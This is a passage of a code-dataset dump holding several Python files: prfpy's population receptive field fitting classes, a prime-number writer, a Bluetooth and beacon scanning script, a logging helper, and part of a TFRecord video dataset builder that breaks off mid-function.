**args)[0]))[0])\n\n\ndef iterative_search(model, data, start_params, args, xtol, ftol, verbose=True,\n bounds=None, constraints=None, **kwargs):\n \"\"\"iterative_search\n\n Generic minimization function called by iterative_fit.\n Do not call this directly. Use iterative_fit instead.\n\n [description]\n\n Parameters\n ----------\n model : Model\n Object that provides the predictions using its\n `return_prediction` method\n data : 1D numpy.ndarray\n the data to fit, same dimensions as are returned by\n Model's `return_prediction` method\n start_params : list or 1D numpy.ndarray\n initial values for the fit\n args : dictionary, arguments to model.return_prediction that\n are not optimized\n xtol : float, passed to fitting routine\n numerical tolerance on x\n ftol : float, passed to fitting routine\n numerical tolerance on function\n verbose : bool, optional\n whether to have minimizer output.\n bounds : list of tuples, optional\n Bounds for parameter minimization. Must have the same\n length as start_params. The default is None.\n constrains: list of scipy.optimize.LinearConstraints and/or\n scipy.optimize.NonLinearConstraints\n\n **kwargs : TYPE\n DESCRIPTION.\n\n Raises\n ------\n AssertionError\n Raised if parameters and bounds do not have the same length.\n\n Returns\n -------\n 2-tuple\n first element: parameter values,\n second element: rsq value\n \"\"\"\n if bounds is not None:\n assert len(bounds) == len(\n start_params), \"Unequal bounds and parameters\"\n\n\n if constraints is None:\n if verbose:\n print('Performing bounded, unconstrained minimization (L-BFGS-B).')\n\n output = minimize(error_function, start_params, bounds=bounds,\n args=(\n args, data, model.return_prediction),\n method='L-BFGS-B',\n # default max line searches is 20\n options=dict(ftol=ftol,\n maxls=40,\n disp=verbose))\n else:\n if verbose:\n print('Performing bounded, constrained minimization (trust-constr).')\n\n output = minimize(error_function, start_params, bounds=bounds,\n args=(args, data,\n model.return_prediction),\n method='trust-constr',\n constraints=constraints,\n tol=ftol,\n options=dict(xtol=xtol,\n disp=verbose))\n\n\n # output = basinhopping(error_function, start_params,\n # niter=10, T=0.01*(len(data) * data.var()), stepsize=2,\n # minimizer_kwargs=dict(method='L-BFGS-B',\n # bounds=bounds,\n # options=dict(maxls=60, disp=verbose),\n # args=(args, data, model.return_prediction)))\n\n # output = shgo(error_function, bounds=bounds,\n # args=(args, data, model.return_prediction),\n # options=dict(disp=verbose),\n # minimizer_kwargs=dict(method='L-BFGS-B',\n # bounds=bounds,\n # args=(args, data, model.return_prediction)))\n\n # output = dual_annealing(error_function, bounds=bounds,\n # args=(args, data, model.return_prediction),\n # x0=start_params)\n\n return np.nan_to_num(np.r_[output['x'], 1 -\n (output['fun'])/(len(data) * data.var())])\n\n else:\n if verbose:\n print('Performing unbounded, unconstrained minimization (Powell).')\n\n output = fmin_powell(\n error_function,\n start_params,\n xtol=xtol,\n ftol=ftol,\n args=(\n args,\n data,\n model.return_prediction),\n full_output=True,\n disp=verbose)\n\n return np.nan_to_num(np.r_[output[0], 1 - (output[1])/(len(data) * data.var())])\n\n\nclass Fitter:\n \"\"\"Fitter\n\n Superclass for classes that implement the different fitting methods,\n for a given model. It contains 2D-data and leverages a Model object.\n\n data should be two-dimensional so that all bookkeeping with regard to voxels,\n electrodes, etc is done by the user. Generally, a Fitter class should implement\n both a `grid_fit` and an `interative_fit` method to be run in sequence.\n\n \"\"\"\n\n def __init__(self, data, model, n_jobs=1, fit_hrf=False, **kwargs):\n \"\"\"__init__ sets up data and model\n\n Parameters\n ----------\n data : numpy.ndarray, 2D\n input data. First dimension units, Second dimension time\n model : prfpy.Model\n Model object that provides the grid and iterative search\n predictions.\n n_jobs : int, optional\n number of jobs to use in parallelization (iterative search), by default 1\n fit_hrf : boolean, optional\n Whether or not to fit two extra parameters for hrf derivative and\n dispersion. The default is False.\n \"\"\"\n assert len(data.shape) == 2, \\\n \"input data should be two-dimensional, with first dimension units and second dimension time\" \n\n \n self.data = data.astype('float32')\n \n self.model = model\n self.n_jobs = n_jobs\n self.fit_hrf = fit_hrf\n\n self.__dict__.update(kwargs)\n\n self.n_units = self.data.shape[0]\n self.n_timepoints = self.data.shape[-1]\n\n self.data_var = self.data.var(axis=-1)\n\n def iterative_fit(self,\n rsq_threshold,\n verbose=False,\n starting_params=None,\n bounds=None,\n args={},\n constraints=None,\n xtol=1e-4,\n ftol=1e-3):\n \"\"\"\n Generic function for iterative fitting. Does not need to be\n redefined for new models. It is sufficient to define\n `insert_new_model_params` or `grid_fit` in the new model Fitter class,\n or provide explicit `starting_params`\n (see Extend_Iso2DGaussianFitter for examples).\n\n\n Parameters\n ----------\n rsq_threshold : float\n Rsq threshold for iterative fitting. Must be between 0 and 1.\n verbose : boolean, optional\n Whether to print output. The default is False.\n starting_params : ndarray of size [units, model params +1], optional\n Explicit start for iterative fit. The default is None.\n bounds : list of tuples, optional\n Bounds for parameter minimization. The default is None.\n args : dictionary, optional\n Further arguments passed to iterative_search. The default is {}.\n constrains: list of scipy.optimize.LinearConstraints and/or\n scipy.optimize.NonLinearConstraints\n Returns\n -------\n None.\n\n \"\"\"\n\n self.bounds = bounds\n self.constraints = constraints\n\n if starting_params is None:\n assert hasattr(\n self, 'gridsearch_params'), 'First use self.grid_fit,\\\n or provide explicit starting parameters!'\n\n self.starting_params = self.gridsearch_params\n\n if self.fit_hrf:\n self.starting_params = np.insert(\n self.starting_params, -1, 1.0, axis=-1)\n self.starting_params = np.insert(\n self.starting_params, -1, 0.0, axis=-1)\n\n else:\n self.starting_params = starting_params\n \n if not hasattr(self,'rsq_mask'):\n #use the grid or explicitly provided params to select voxels to fit\n self.rsq_mask = self.starting_params[:, -1] > rsq_threshold\n\n self.iterative_search_params = np.zeros_like(self.starting_params)\n\n if self.rsq_mask.sum()>0:\n iterative_search_params = Parallel(self.n_jobs, verbose=verbose)(\n delayed(iterative_search)(self.model,\n data,\n start_params,\n args=args,\n xtol=xtol,\n ftol=ftol,\n verbose=verbose,\n bounds=self.bounds,\n constraints=self.constraints)\n for (data, start_params) in zip(self.data[self.rsq_mask], self.starting_params[self.rsq_mask, :-1]))\n self.iterative_search_params[self.rsq_mask] = np.array(\n iterative_search_params)\n \n \n def crossvalidate_fit(self,\n test_data,\n test_stimulus=None,\n single_hrf=True):\n \"\"\"\n Simple function to crossvalidate results of previous iterative fitting.\n \n\n Parameters\n ----------\n test_data : TYPE\n DESCRIPTION.\n test_stimulus : TYPE, optional\n DESCRIPTION. The default is None.\n single_hrf : TYPE, optional\n DESCRIPTION. The default is True.\n\n Returns\n -------\n None.\n\n \"\"\"\n\n assert hasattr(\n self, 'iterative_search_params'), 'First use self.iterative_fit,' \n \n #to hande cases where test_data and fit_data have different stimuli\n fit_stimulus = deepcopy(self.model.stimulus) \n if test_stimulus is not None: \n self.model.stimulus = test_stimulus\n \n if self.rsq_mask.sum()>0:\n if self.fit_hrf and single_hrf:\n median_hrf_params = np.median(self.iterative_search_params[self.rsq_mask,-3:-1],\n axis=0)\n \n self.iterative_search_params[self.rsq_mask,-3:-1] = median_hrf_params\n \n \n test_predictions = self.model.return_prediction(*list(self.iterative_search_params[self.rsq_mask,:-1].T))\n self.model.stimulus = fit_stimulus\n \n #calculate CV-rsq \n CV_rsq = np.nan_to_num(1-np.sum((test_data[self.rsq_mask]-test_predictions)**2, axis=-1)/(test_data.shape[-1]*test_data[self.rsq_mask].var(-1)))\n #calcualte CV-correlation\n #CV_rsq = np.zeros(self.rsq_mask.sum())\n #for i in range(len(CV_rsq)):\n # CV_rsq[i] = np.nan_to_num(pearsonr(test_data[self.rsq_mask][i],np.nan_to_num(test_predictions[i]))[0])\n \n self.iterative_search_params[self.rsq_mask,-1] = CV_rsq\n else:\n print(\"No voxels/vertices above Rsq threshold were found.\")\n\n\n if self.data.shape == test_data.shape:\n \n self.noise_ceiling = np.zeros(self.n_units)\n \n n_c = 1-np.sum((test_data[self.rsq_mask]-self.data[self.rsq_mask])**2, axis=-1)/(test_data.shape[-1]*test_data[self.rsq_mask].var(-1))\n \n self.noise_ceiling[self.rsq_mask] = n_c\n\n \n \n\n\nclass Iso2DGaussianFitter(Fitter):\n \"\"\"Iso2DGaussianFitter\n\n Class that implements the different fitting methods\n on a two-dimensional isotropic Gaussian pRF model,\n leveraging a Model object.\n\n \"\"\"\n\n def grid_fit(self,\n ecc_grid,\n polar_grid,\n size_grid,\n verbose=False,\n n_batches=1000,\n pos_prfs_only=True):\n \"\"\"grid_fit\n\n performs grid fit using provided grids and predictor definitions\n\n\n Parameters\n ----------\n ecc_grid : 1D ndarray\n to be filled in by user\n polar_grid : 1D ndarray\n to be filled in by user\n size_grid : 1D ndarray\n to be filled in by user\n verbose : boolean, optional\n print output. The default is False.\n n_batches : int, optional\n The grid fit is performed in parallel over n_batches of units.\n Batch parallelization is faster than single-unit\n parallelization and of sequential computing.\n pos_prfs_only : bool, optional\n Enforce positive PRFs only.\n\n Returns\n -------\n None.\n\n \"\"\"\n # let the model create the timecourses\n self.model.create_grid_predictions(ecc_grid=ecc_grid,\n polar_grid=polar_grid,\n size_grid=size_grid)\n self.model.predictions = self.model.predictions.astype('float32')\n\n # this function analytically computes best-fit rsq, slope, and baseline\n # for a given batch of units (faster than scipy/numpy lstsq).\n def rsq_betas_for_batch(data, vox_num, predictions,\n n_timepoints, data_var,\n sum_preds, square_norm_preds):\n result = np.zeros((data.shape[0], 4), dtype='float32')\n for vox_data, num, idx in zip(\n data, vox_num, np.arange(\n data.shape[0])):\n # bookkeeping\n sumd = np.sum(vox_data)\n\n # best slopes and baselines for voxel for predictions\n slopes = (n_timepoints * np.dot(vox_data, predictions.T) - sumd *\n sum_preds) / (n_timepoints * square_norm_preds - sum_preds**2)\n baselines = (sumd - slopes * sum_preds) / n_timepoints\n\n # resid and rsq\n resid = np.linalg.norm((vox_data -\n slopes[..., np.newaxis] *\n predictions -\n baselines[..., np.newaxis]), axis=-\n 1, ord=2)\n\n #to enforce, if possible, positive prf amplitude\n if pos_prfs_only:\n if np.any(slopes>0):\n resid[slopes<=0] = +np.inf\n\n best_pred_voxel = np.nanargmin(resid)\n rsq = 1 - resid[best_pred_voxel]**2 / \\\n (n_timepoints * data_var[num])\n\n result[idx, :] = best_pred_voxel, rsq, baselines[best_pred_voxel], slopes[best_pred_voxel]\n\n return result\n\n # bookkeeping\n sum_preds = np.sum(self.model.predictions, axis=-1)\n square_norm_preds = np.linalg.norm(\n self.model.predictions, axis=-1, ord=2)**2\n\n # split data in batches\n split_indices = np.array_split(\n np.arange(self.data.shape[0]), n_batches)\n data_batches = np.array_split(self.data, n_batches, axis=0)\n if verbose:\n print(\"Each batch contains approx. \" +\n str(data_batches[0].shape[0]) + \" voxels.\")\n\n # perform grid fit\n grid_search_rbs = Parallel(self.n_jobs, verbose=verbose)(\n delayed(rsq_betas_for_batch)(\n data=data,\n vox_num=vox_num,\n predictions=self.model.predictions,\n n_timepoints=self.n_timepoints,\n data_var=self.data_var,\n sum_preds=sum_preds,\n square_norm_preds=square_norm_preds)\n for data, vox_num in zip(data_batches, split_indices))\n\n grid_search_rbs = np.concatenate(grid_search_rbs, axis=0)\n\n max_rsqs = grid_search_rbs[:, 0].astype('int')\n self.gridsearch_r2 = grid_search_rbs[:, 1]\n self.best_fitting_baseline = grid_search_rbs[:, 2]\n self.best_fitting_beta = grid_search_rbs[:, 3]\n\n # output\n self.gridsearch_params = np.array([\n self.model.xs.ravel()[max_rsqs],\n self.model.ys.ravel()[max_rsqs],\n self.model.sizes.ravel()[max_rsqs],\n self.best_fitting_beta,\n self.best_fitting_baseline,\n self.gridsearch_r2\n ]).T\n\n\nclass Extend_Iso2DGaussianFitter(Iso2DGaussianFitter):\n \"\"\"\n\n Generic superclass to extend the Gaussian Fitter. If an existing\n Iso2DGaussianFitter object with iterative_search_params is provided, the\n prf position, size, and rsq parameters will be used for further minimizations.\n\n \"\"\"\n\n def __init__(self, model, data, n_jobs=1, fit_hrf=False,\n previous_gaussian_fitter=None,\n **kwargs):\n \"\"\"\n\n Parameters\n ----------\n data : numpy.ndarray, 2D\n input data. First dimension units, Second dimension time\n model : prfpy.Model\n Model object that provides the grid and iterative search\n predictions.\n n_jobs : int, optional\n number of jobs to use in parallelization (iterative search), by default 1\n previous_gaussian_fitter : Iso2DGaussianFitter, optional\n Must have iterative_search_params. The default is None.\n **kwargs : TYPE\n DESCRIPTION.\n\n Returns\n -------\n None.\n\n \"\"\"\n\n if previous_gaussian_fitter is not None:\n if not hasattr(previous_gaussian_fitter,\n 'iterative_search_params'):\n print('Warning: gaussian iter fit not performed. Explicit\\\n starting parameters or grid params will be needed.')\n\n self.previous_gaussian_fitter = previous_gaussian_fitter\n\n super().__init__(data, model, n_jobs=n_jobs, fit_hrf=fit_hrf, **kwargs)\n\n def insert_new_model_params(self, old_params):\n \"\"\"\n Function to insert new model parameters starting values for iterfitting.\n To be redefined appropriately for each model (see below for examples).\n If `grid_fit` is defined and performed, `self.gridsearch_params` take\n precedence, and this function becomes unnecessary.\n\n Parameters\n ----------\n old_params : ndarray [n_units, 6]\n Previous Gaussian fitter parameters and rsq.\n\n Returns\n -------\n new_params : ndarray [n_units, number of new model parameters]\n Starting parameters for iterative fit.\n To be redefined appropriately for each model.\n\n \"\"\"\n\n new_params = old_params\n return new_params\n\n def iterative_fit(self,\n rsq_threshold,\n verbose=False,\n starting_params=None,\n bounds=None,\n args={},\n constraints=[],\n xtol=1e-4,\n ftol=1e-3):\n \"\"\"\n Iterative_fit for models building on top of the Gaussian. Does not need to be\n redefined for new models. It is sufficient to define either\n `insert_new_model_params` or `grid_fit`, in a new model Fitter class,\n or provide explicit `starting_params`.\n\n\n Parameters\n ----------\n rsq_threshold : float\n Rsq threshold for iterative fitting. Must be between 0 and 1.\n verbose : boolean, optional\n Whether to print output. The default is False.\n starting_params : ndarray of size [units, model_params +1], optional\n Explicit start for minimization. The default is None.\n bounds : list of tuples, optional\n Bounds for parameter minimization. The default is None.\n args : dictionary, optional\n Further arguments passed to iterative_search. The default is {}.\n\n Returns\n -------\n None.\n\n \"\"\"\n\n if starting_params is None and not hasattr(\n self, 'gridsearch_params') and hasattr(\n self, 'previous_gaussian_fitter'):\n\n starting_params = self.insert_new_model_params(\n self.previous_gaussian_fitter.iterative_search_params)\n \n #fit exactly the same voxels/vertices as previous\n if hasattr(self.previous_gaussian_fitter, 'rsq_mask'):\n self.rsq_mask = self.previous_gaussian_fitter.rsq_mask\n else:\n self.rsq_mask = self.previous_gaussian_fitter.gridsearch_params[:,-1] > rsq_threshold\n\n # enforcing hrf_fit \"consistency\" with previous gaussian fit:\n if self.previous_gaussian_fitter.fit_hrf != self.fit_hrf:\n\n print(\"Warning: fit_hrf was \" + str(\n self.previous_gaussian_fitter.fit_hrf) + \" in previous_\\\n gaussian_fit. Overriding current fit_hrf to avoid inconsistency.\")\n\n self.fit_hrf = self.previous_gaussian_fitter.fit_hrf\n\n super().iterative_fit(rsq_threshold=rsq_threshold,\n verbose=verbose,\n starting_params=starting_params,\n bounds=bounds,\n args=args,\n constraints=constraints,\n xtol=xtol,\n ftol=ftol)\n\n\nclass CSS_Iso2DGaussianFitter(Extend_Iso2DGaussianFitter):\n \"\"\"CSS_Iso2DGaussianFitter\n\n Compressive Spatial Summation model\n \"\"\"\n\n def insert_new_model_params(self, old_params):\n \"\"\"\n Parameters\n ----------\n old_params : ndarray [n_units, 6]\n Previous Gaussian fitter parameters and rsq.\n\n Returns\n -------\n new_params : ndarray [n_units, 7]\n Starting parameters and rsq for CSS iterative fit.\n\n \"\"\"\n # insert CSS exponent\n new_params = np.insert(old_params, 5, 1.0, axis=-1)\n return new_params\n\n\nclass DoG_Iso2DGaussianFitter(Extend_Iso2DGaussianFitter):\n \"\"\"DoG_Iso2DGaussianFitter\n\n Difference of Gaussians model\n \"\"\"\n\n def insert_new_model_params(self, old_params):\n \"\"\"\n Parameters\n ----------\n old_params : ndarray [n_units, 6]\n Previous Gaussian fitter parameters and rsq.\n\n Returns\n -------\n new_params : ndarray [n_units, 8]\n Starting parameters and rsq for DoG iterative fit.\n\n \"\"\"\n # surround amplitude\n new_params = np.insert(old_params, 5, 0.5*old_params[:,3], axis=-1)\n # surround size\n new_params = np.insert(\n new_params,\n 6,\n 1.5*old_params[:,2],\n axis=-1)\n\n return new_params\n\n\nclass Norm_Iso2DGaussianFitter(Extend_Iso2DGaussianFitter):\n \"\"\"Norm_Iso2DGaussianFitter\n\n Divisive Normalization model\n\n \"\"\"\n\n def insert_new_model_params(self, old_params):\n \"\"\"\n Note: this function is generally unused since there is an\n efficient grid_fit for the normalization model (below)\n\n Parameters\n ----------\n old_params : ndarray [n_units, 6]\n Previous Gaussian fitter parameters and rsq.\n\n Returns\n -------\n new_params : ndarray [n_units, 10]\n Starting parameters and rsq for norm iterative fit.\n\n \"\"\"\n # surround amplitude\n new_params = np.insert(old_params, 5, 0.0, axis=-1)\n # surround size\n new_params = np.insert(\n new_params,\n 6,\n 1.5*old_params[:,2],\n axis=-1)\n # neural baseline\n new_params = np.insert(new_params, 7, 0.0, axis=-1)\n # surround baseline\n new_params = np.insert(new_params, 8, 1.0, axis=-1)\n\n return new_params\n\n def grid_fit(self,\n surround_amplitude_grid,\n surround_size_grid,\n neural_baseline_grid,\n surround_baseline_grid,\n gaussian_params=None,\n verbose=False,\n n_batches=1000,\n rsq_threshold=0.1,\n pos_prfs_only=True):\n \"\"\"\n This function performs a grid_fit for the normalization model new parameters.\n The fit is parallel over batches of voxels, and separate predictions are\n made for each voxels based on its previously obtained Gaussian parameters (position and size).\n These can be provided explicitly in `gaussian_params`, or otherwise\n they are obtained from `previous_gaussian_fitter.iterative_search_params`\n\n\n Parameters\n ----------\n surround_amplitude_grid : 1D ndarray\n Array of surround amplitude values.\n surround_size_grid : 1D ndarray\n Array of surround size values.\n neural_baseline_grid : 1D ndarray\n Array of neural baseline values.\n surround_baseline_grid : 1D ndarray\n Array of surround baseline values.\n gaussian_params : ndarray [n_units, 4], optional\n The Gaussian parms [x position, y position, prf size, rsq] can be\n provided explicitly. If not, a previous_gaussian_fitter must be\n provided. The default is None.\n verbose : boolean, optional\n print output. The default is False.\n n_batches : int, optional\n Number of voxel batches. The default is 1000.\n rsq_threshold : float, optional\n rsq threshold for grid fitting. The default is 0.1.\n\n Raises\n ------\n ValueError\n Raised if there is no previous_gaussian_fitter or gaussian params.\n\n \"\"\"\n\n # setting up grid for norm model new params\n self.sa, self.ss, self.nb, self.sb = np.meshgrid(\n surround_amplitude_grid, surround_size_grid,\n neural_baseline_grid, surround_baseline_grid)\n\n self.sa = self.sa.ravel()\n self.ss = self.ss.ravel()\n self.nb = self.nb.ravel()\n self.sb = self.sb.ravel()\n\n self.n_predictions = len(self.nb)\n\n if gaussian_params is not None and gaussian_params.shape == (\n self.n_units, 4):\n self.gaussian_params = gaussian_params.astype('float32')\n self.gridsearch_rsq_mask = self.gaussian_params[:, -1] > rsq_threshold\n \n elif hasattr(self, 'previous_gaussian_fitter'):\n starting_params_grid = self.previous_gaussian_fitter.iterative_search_params\n self.gaussian_params = np.concatenate(\n (starting_params_grid[:, :3], starting_params_grid[:, -1][..., np.newaxis]), axis=-1)\n \n if hasattr(self.previous_gaussian_fitter, 'rsq_mask'):\n self.gridsearch_rsq_mask = self.previous_gaussian_fitter.rsq_mask\n else:\n self.gridsearch_rsq_mask = self.previous_gaussian_fitter.gridsearch_params[:, -1] > self.rsq_threshold\n \n else:\n print('Please provide suitable [n_units, 4] gaussian_params,\\\n or previous_gaussian_fitter')\n raise ValueError\n\n \n\n # this function analytically computes best-fit rsq, slope, and baseline\n # for a given batch of units (faster than scipy/numpy lstsq).\n def rsq_betas_for_batch(data,\n vox_nums,\n n_predictions,\n n_timepoints,\n data_var,\n sa, ss, nb, sb,\n gaussian_params):\n\n result = np.zeros((data.shape[0], 4), dtype='float32')\n\n for vox_data, vox_num, idx in zip(\n data, vox_nums, np.arange(\n data.shape[0])):\n\n # let the model create the timecourses, per voxel, since the\n # gridding is over new parameters, while size and position\n # are obtained from previous Gaussian fit\n predictions = self.model.create_grid_predictions(\n gaussian_params[vox_num, :-1], n_predictions, n_timepoints, sa, ss, nb, sb)\n # bookkeeping\n sum_preds = np.sum(predictions, axis=-1)\n square_norm_preds = np.linalg.norm(\n predictions, axis=-1, ord=2)**2\n sumd = np.sum(vox_data)\n\n # best possible slopes and baselines\n slopes = (n_timepoints * np.dot(vox_data, predictions.T) - sumd *\n sum_preds) / (n_timepoints * square_norm_preds - sum_preds**2)\n baselines = (sumd - slopes * sum_preds) / n_timepoints\n\n # find best prediction and store relevant data\n resid = np.linalg.norm((vox_data -\n slopes[..., np.newaxis] *\n predictions -\n baselines[..., np.newaxis]), ord=2, axis=-\n 1)\n\n #to enforce, if possible, positive prf amplitude & neural baseline\n if pos_prfs_only:\n if np.any(slopes>0):\n resid[slopes<=0] = +np.inf\n\n best_pred_voxel = np.nanargmin(resid)\n\n rsq = 1 - resid[best_pred_voxel]**2 / \\\n (n_timepoints * data_var[vox_num])\n\n result[idx, :] = best_pred_voxel, rsq, baselines[best_pred_voxel], slopes[best_pred_voxel]\n\n return result\n\n # masking and splitting data\n split_indices = np.array_split(np.arange(self.data.shape[0])[\n self.gridsearch_rsq_mask], n_batches)\n data_batches = np.array_split(\n self.data[self.gridsearch_rsq_mask], n_batches, axis=0)\n\n if verbose:\n print(\"Each batch contains approx. \" +\n str(data_batches[0].shape[0]) + \" voxels.\")\n\n # parallel grid search over (sequential) batches of voxels\n grid_search_rbs = Parallel(self.n_jobs, verbose=11)(\n delayed(rsq_betas_for_batch)(\n data=data,\n vox_nums=vox_nums,\n n_predictions=self.n_predictions,\n n_timepoints=self.n_timepoints,\n data_var=self.data_var,\n sa=self.sa,\n ss=self.ss,\n nb=self.nb,\n sb=self.sb,\n gaussian_params=self.gaussian_params)\n for data, vox_nums in zip(data_batches, split_indices))\n\n grid_search_rbs = np.concatenate(grid_search_rbs, axis=0)\n\n # store results\n max_rsqs = grid_search_rbs[:, 0].astype('int')\n self.gridsearch_r2 = grid_search_rbs[:, 1]\n self.best_fitting_baseline = grid_search_rbs[:, 2]\n self.best_fitting_beta = grid_search_rbs[:, 3]\n\n self.gridsearch_params = np.zeros((self.n_units, 10))\n\n self.gridsearch_params[self.gridsearch_rsq_mask] = np.array([\n self.gaussian_params[self.gridsearch_rsq_mask, 0],\n self.gaussian_params[self.gridsearch_rsq_mask, 1],\n self.gaussian_params[self.gridsearch_rsq_mask, 2],\n self.best_fitting_beta,\n self.best_fitting_baseline,\n self.sa[max_rsqs],\n self.ss[max_rsqs],\n self.nb[max_rsqs] * self.best_fitting_beta,\n self.sb[max_rsqs],\n self.gridsearch_r2\n ]).T\n","sub_path":"mri_analysis/model/prfpy/fit.py","file_name":"fit.py","file_ext":"py","file_size_in_byte":32962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"546315957","text":"#!/usr/bin/env python\n\nimport sys\nimport os\nfrom core import *\n\ntry:\n max=int(sys.argv[1])\nexcept:\n max=int(raw_input(\"Max number(0 for infinity): \"))\ntry:\n filename = sys.argv[2]\nexcept:\n filename = \"primenums.txt\"\nnum = 0\nif os.path.isfile(filename):\n print(\"%s exists!\"%filename)\n file = open(filename, 'r')\n for line in file:\n x = line\n num = int(x.split(\",\")[-2])\n print(\"Starting from %i\" %num)\n file.close()\nelse:\n print(\"Creating %s\"%filename)\n file = open(filename, \"w\")\n file.write(\"\")\n file.close()\nfile = open(filename, \"a\")\nif max > 0:\n while num <= max:\n if is_prime(num):\n print(num)\n file.write(\"%i,\"%num)\n num = num + 1\nelif max == 0:\n while True:\n if is_prime(num):\n print(num)\n file.write(\"%i,\"%num)\n num = num + 1\nfile.close()\n","sub_path":"Math/primeMine.py","file_name":"primeMine.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"653371600","text":"from bluetooth.ble import BeaconService\r\nfrom bluetooth.ble import DiscoveryService\r\nimport bluetooth\r\n\r\nprint('start')\r\n\r\nnearby_devices = bluetooth.discover_devices(lookup_names=True)\r\nprint(\"Found {} devices.\".format(len(nearby_devices)))\r\n\r\nfor addr, name in nearby_devices:\r\n print(\" {} - {}\".format(addr, name))\r\n\r\nprint('start')\r\n\r\nservice = DiscoveryService()\r\ndevices = service.discover(2)\r\n\r\nfor address, name in devices.items():\r\n print(\"name: {}, address: {}\".format(name, address))\r\n\r\nprint('start')\r\n\r\nclass Beacon(object):\r\n \r\n def __init__(self, data, address):\r\n self._uuid = data[0]\r\n self._major = data[1]\r\n self._minor = data[2]\r\n self._power = data[3]\r\n self._rssi = data[4]\r\n self._address = address\r\n \r\n def __str__(self):\r\n ret = \"Beacon: address:{ADDR} uuid:{UUID} major:{MAJOR}\"\\\r\n \" minor:{MINOR} txpower:{POWER} rssi:{RSSI}\"\\\r\n .format(ADDR=self._address, UUID=self._uuid, MAJOR=self._major,\r\n MINOR=self._minor, POWER=self._power, RSSI=self._rssi)\r\n return ret\r\n\r\nservice = BeaconService('hci0')\r\ndevices = service.scan(1)\r\n\r\nfor address, data in list(devices.items()):\r\n b = Beacon(data, address)\r\n print(b)\r\n\r\nprint(\"Done.\")","sub_path":"Collin/testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"328011620","text":"import logging.handlers\nimport os \n\n\nclass LOG(logging.Logger):\n def __init__(self, filename=None):\n super(LOG, self).__init__(self)\n\n if filename is None:\n filename = 'test.log'\n if not os.path.exists(os.path.join(os.path.split(os.path.realpath(__file__))[0],'logs')):\n os.makedirs(os.path.join(os.path.split(os.path.realpath(__file__))[0],'logs'), 0o700)\n self.filename = os.path.join(os.path.split(os.path.realpath(__file__))[0],'logs',filename)\n\n\n fh = logging.handlers.TimedRotatingFileHandler(self.filename, 'D', 1, 30)\n fh.suffix = \"%Y%m%d-%H%M.log\"\n fh.setLevel(logging.DEBUG) \n\n\n ch = logging.StreamHandler() \n ch.setLevel(logging.DEBUG) \n\n\n formatter = logging.Formatter(\"[%(asctime)s] [%(levelname)8s] %(message)s\")\n fh.setFormatter(formatter) \n ch.setFormatter(formatter) \n\n\n self.addHandler(fh) \n self.addHandler(ch) \n\nif __name__ == '__main__':\n pass\n","sub_path":"测试api/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"435971877","text":"from __future__ import absolute_import, division, print_function\n\nimport os, random\nimport tensorflow as tf\nimport numpy as np\nimport glob\nfrom skimage import io, color, transform, img_as_ubyte\nimport skvideo.io\nimport random\nimport threading\nfrom datetime import datetime\nimport sys\n\nFLAGS = tf.app.flags.FLAGS\n\ntf.app.flags.DEFINE_string('train_list',\n '/home/zyq/moment_in_time/train_list.txt',\n 'Traing video directory')\ntf.app.flags.DEFINE_string('val_list',\n '/home/zyq/moment_in_time/validation_list.txt',\n 'Validation video directory')\n\ntf.app.flags.DEFINE_string('output_dir',\n '/home/zyq/moment_in_time/dataset/',\n 'Output directory')\n\ntf.app.flags.DEFINE_integer('train_shards', 1024,\n 'Number of shards in training TFRecord files.')\ntf.app.flags.DEFINE_integer('val_shards', 128,\n 'Number of shards in training TFRecord files.')\n\ntf.flags.DEFINE_integer('num_threads', 16,\n 'Numbers of threads to preprocess the videos.')\n\n\ndef _int64_feature(value):\n return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))\n\n\ndef _bytes_feature(value):\n return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))\n\n\ndef _float_feature(value):\n return tf.train.Feature(float_list=tf.train.FloatList(value=[value]))\n\n\ndef _int64_feature_list(values):\n return tf.train.FeatureList(feature=[_int64_feature(v) for v in values])\n\n\ndef _bytes_feature_list(values):\n return tf.train.FeatureList(feature=[_bytes_feature(v) for v in values])\n\ndef get_label(label_file):\n dict = {}\n with open(label_file) as f:\n lines = f.readlines()\n for line in lines:\n class_name = line.split(',')[0]\n class_num = line.split(',')[1]\n dict[class_name] = class_num\n return dict\n\ndef get_video_frames(video_path):\n videogen = skvideo.io.vreader(video_path)\n frames = np.asarray([frame for frame in videogen])\n return frames\n\ndef _to_sequence_example(video, dict, num_frame=64):\n '''Build a SequenceExample proto for an video-label pair.\n Args:\n video_path: Path of video data_process.\n label_path: Path of label data_process.\n vocab: A Vocabulary object.\n Returns:\n A SequenceExample proto.\n '''\n\n video_path = video.split(' ')[0]\n video_frames = int(video.split(' ')[1])\n label = int(video.split(' ')[2])\n confidence = int(video.split(' ')[3][0])\n frame_list = glob.glob(os.path.join(video_path, '*img*'))\n flow_x_list = glob.glob(os.path.join(video_path, '*flow_x*'))\n flow_y_list = glob.glob(os.path.join(video_path, '*flow_y*'))\n if len(frame_list) < num_frame or len(flow_x_list) < num_frame or len(flow_y_list) < num_frame:\n raise ('{} frames not enough!'.format(video_path))\n assert len(frame_list) == len(flow_x_list)\n assert len(flow_x_list) == len(flow_y_list)\n\n start = random.randrange(1, 1 + len(frame_list) - num_frame)\n frames = []\n flow_xs = []\n flow_ys = []\n for i in range(num_frame):\n frame = video_path + '/img_' + str(i + start).zfill(5) + '.jpg'\n flow_x = video_path + '/flow_x_' + str(i + start).zfill(5) + '.jpg'\n flow_y = video_path + '/flow_y_' + str(i + start).zfill(5) + '.jpg'\n frames.append(io.imread(frame))\n flow_xs.append(io.imread(flow_x))\n flow_ys.append(io.imread(flow_y))\n\n frames_byte = [frame.tostring() for frame in frames]\n flow_xs_byte = [frame.tostring() for frame in flow_xs]\n flow_ys_byte = [frame.tostring() for frame in flow_ys]\n\n example = tf.train.SequenceExample(\n context=tf.train.Features(feature={\n \"class\": _int64_feature(label),\n \"confidence\": _int64_feature(confidence)\n }),\n feature_lists=tf.train.FeatureLists(feature_list={\n \"frames\": 